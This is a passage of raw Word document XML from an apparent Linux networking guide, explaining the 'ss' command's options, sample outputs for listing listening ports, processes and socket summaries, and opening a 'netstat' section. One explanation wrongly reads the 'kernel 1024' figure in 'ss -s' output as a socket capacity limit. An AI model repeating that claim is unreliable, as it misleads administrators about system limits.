              <w:t>Display SCTP sockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="423DF66A" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52933274"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 NSNAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74036B72" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Switch to specified network namespace</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4C266171" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E23200A"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Z, --context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0491102E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display SELinux security context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="777516BF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F69066" w14:textId="5963669C" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Show all listening ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0E925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s -tuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0911D68D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C608DC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etid  State    Recv-Q Send-Q Local Address:Port  Peer Address:Port Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2AF73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udp    UNCONN   0      0            0.0.0.0:68         0.0.0.0:*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B95A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udp    UNCONN   0      0          127.0.0.1:323        0.0.0.0:*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8843C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cp    LISTEN   0      128          0.0.0.0:22         0.0.0.0:*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589D715A"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cp    LISTEN   0      5          127.0.0.1:631        0.0.0.0:*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1262F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cp    LISTEN   0      100        127.0.0.1:25         0.0.0.0:*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6A517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cp    LISTEN   0      128             [::]:22            [::]:*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C48951" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D4B3BA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Netid</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Protocol type (udp for UDP, tcp for TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FFD578" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Socket state (UNCONN=unconnected UDP, LISTEN=listening TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AD0979" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recv-Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Bytes waiting in receive queue (0 = no backlog)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E515F97" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Send-Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Bytes in send queue (128 = listen backlog size for TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CD0EA0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0.0.0.0:68</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: DHCP client port (bootpc) listening on all interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB70A1C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>127.0.0.1:323</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Chrony NTP daemon (localhost only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BA2EB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0.0.0.0:22</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: SSH server listening on all IPv4 interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15760DE8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>127.0.0.1:631</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: CUPS printing system (localhost only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D002C8F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>127.0.0.1:25</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Mail server (localhost only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABA5B64" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[::]:22</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: SSH server listening on all IPv6 interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A50E578" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process column</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Would show process name if -p option used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7FF3C7" w14:textId="547553D1" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Show processes using sockets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B7E23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s -tulpn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D8E41" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F7114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etid  State   Recv-Q Send-Q Local Address:Port Peer Address:Port Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725EBD7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cp    LISTEN  0      128          0.0.0.0:22        0.0.0.0:*     users:(("sshd",pid=1234,fd=3))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3796658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cp    LISTEN  0      100        127.0.0.1:25        0.0.0.0:*     users:(("master",pid=5678,fd=13))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC300E2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1705A117" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-p flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Shows process information for each socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E01B1AB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users:(("sshd",pid=1234,fd=3))</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Process name, process ID, and file descriptor number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3209BD72" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sshd</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: SSH daemon process listening on port 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB58D77" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Postfix mail server master process on port 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6200D9E8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pid=1234</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Process identifier for the SSH daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B484A7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fd=3</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: File descriptor number used by the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0951DFAD" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Troubleshooting</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Helps identify which processes are using specific ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FE9DA1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Verify expected processes are running on standard ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F202A7" w14:textId="54392BDD" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Show established connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5CA05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s -tuln state established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058074D1" w14:textId="16EBDDAF" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:lastRenderedPageBreak/>
        <w:t>Socket summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0E1A6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s -s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34183FF5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215A5F9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otal: 892 (kernel 1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2312DA1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CP:   12 (estab 4, closed 3, orphaned 0, synrecv 0, timewait 2/0), ports 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25444AF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ransport Total     IP        IPv6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FDA81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UDP       8         6         2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6925A46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CP       9         7         2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6421433C"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INET      18        13        5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D2EA2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5992F4E3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Total: 892 (kernel 1024)</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: 892 sockets in use, kernel can handle up to 1024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C98200" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>estab 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: 4 established TCP connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8D3C86" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>closed 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: 3 TCP sockets in closed state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B57CAB5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>orphaned 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: 0 orphaned TCP sockets (not attached to process)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1208360F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>synrecv 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: 0 sockets waiting for connection request acknowledgment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600E88AE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>timewait 2/0</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: 2 sockets in TIME_WAIT state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289E73FF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: 8 total UDP sockets (6 IPv4, 2 IPv6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D4CFFB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP 9</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: 9 total TCP sockets (7 IPv4, 2 IPv6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3BC1ED" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>INET 18</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: 18 total internet sockets (13 IPv4, 5 IPv6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B7098" w14:textId="5C1EFBFB" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>netstat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6B6CB6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> command displays network connections, routing tables, and interface statistics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27362E67" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649EE64E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t>Display network connections, listening ports, and routing information (legacy tool).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF623B7" w14:textId="53C129B3" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C4F41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etstat [options]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D5745E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2064"/>
        <w:gridCol w:w="5339"/>
      </w:tblGrid>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4A0BA242" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58DE1BB4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00A6436C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BD9B543" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00A6436C">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
